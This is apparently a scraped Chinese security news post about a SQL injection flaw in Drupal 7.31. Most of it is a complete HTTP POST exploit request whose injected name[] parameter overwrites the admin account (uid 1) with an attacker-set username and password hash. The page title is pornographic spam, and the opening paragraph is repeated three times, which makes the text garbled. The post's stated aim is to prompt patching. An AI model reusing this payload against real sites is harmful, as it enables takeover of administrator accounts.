压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

　　今早有國外安全研究人員在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞，并給出了利用測試的EXP代碼，小編在本地搭建Drupal7.31的環境，經過測試，發現該利用代碼可成功執行并在數據庫中增加一個攻擊者自定義的用戶。

　　測試代碼：(請勿用于非法用途)

　　POST /drupal-7.31/？q=node&destination=node HTTP/1.1Host： 127.0.0.1User-Agent： Mozilla/5.0 (X11； Ubuntu； Linux x86_64； rv：28.0) Gecko/20100101 Firefox/28.0Accept： text/html，application/xhtml+xml，application/xml；q=0.9，*/*；q=0.8Accept-Language： en-US，en；q=0.5Accept-Encoding： gzip， deflateReferer： http：//127.0.0.1/drupal-7.31/Cookie： Drupal.toolbar.collapsed=0； Drupal.tableDrag.showWeight=0； has_js=1Connection： keep-aliveContent-Type： application/x-www-form-urlencodedContent-Length： 231name[0%20；update+users+set+name%3d'owned'+，+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1'；；#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in本地環境測試效果：

　　今早有國外安全研究人員在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞，并給出了利用測試的EXP代碼，小編在本地搭建Drupal7.31的環境，經過測試，發現該利用代碼可成功執行并在數據庫中增加一個攻擊者自定義的用戶。

　　今早有國外安全研究人員在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞，并給出了利用測試的EXP代碼，小編在本地搭建Drupal7.31的環境，經過測試，發現該利用代碼可成功執行并在數據庫中增加一個攻擊者自定義的用戶。

　　請相關廠商關注，并盡快修復漏洞。